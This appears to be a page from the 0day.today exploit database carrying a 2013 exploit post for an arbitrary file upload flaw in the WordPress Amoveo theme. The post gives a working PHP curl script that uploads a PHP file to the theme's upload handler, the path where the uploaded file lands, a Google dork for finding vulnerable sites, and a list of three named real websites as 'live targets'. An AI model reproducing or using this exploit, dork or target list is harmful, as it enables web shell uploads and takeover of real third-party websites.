0day.today －世界最大的漏洞利用数据库。

选择语言:

0day.today 用户须知:

我们唯一的域名：http://0day.today
我们大多数的材料都完全免费
如果你想购买漏洞利用 / 获取V.I.P.权限或者使用其他付费服务，
你需要购买或者赢取金币金币

We accept currencies: [contact admin to find more]

我们不希望本站被用于黑客用途。一经查实用户有任何形式的非法访问行为，此用户的账户和数据会被从本站删除。

本站管理员使用官方账号。请谨防诈骗！

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

我已经是 0day.today 注册用户。不要再显示此信息。

进站须知

请读 [ 协议 ]
请读 [ 提交 ] 规则
请访问 [ 常见问题 ] 页
[ 注册 ] 用户信息
获取 [ 金币 ]
如果你想要 [ 出售 ]
如果你想要 [ 购买 ]
如果你丢失了 [ 账户 ]
如有任何问题 [ [email protected] ]

主链接

你可以由此方式联系我们

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ 授权 ] [ 注册 ] [ 恢复账号 ]

你可以由此方式联系我们:

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

WordPress Amoveo Themes Arbitrary File Upload Vulnerability

作者

Byakuya

风险

[

安全风险级别－高

]

0day-ID

类别

添加日期

平台

###################################################################################################
#_________            .___        _______                ___.   .__        
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____  
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \ 
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/ 
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/ 
###################################################################################################
# Exploit Title: WordPress Amoveo Themes Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 11/02/2013
# Vendor Homepage: http://www.wphub.com/
# Themes Link: http://www.wphub.com/themes/amoveo-by-themeforest/
# Price: $35
# Affected Version: v1.0
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/amoveo/
# Tested on : Windows/Linux
###################################################################################################

# Exploit & POC :

<?php
$uploadfile="up.php"; 
$ch = curl_init("http://127.0.0.1/wordpress/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

#File path: 
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php

#Live Target :
http://www.candlewoodequine.com/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php
http://calvertlabs.com/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php
http://www.drtomroselle.com/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################

#  0day.today [2024-07-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

WordPress Amoveo Themes Arbitrary File Upload Vulnerability

报告错误

报告错误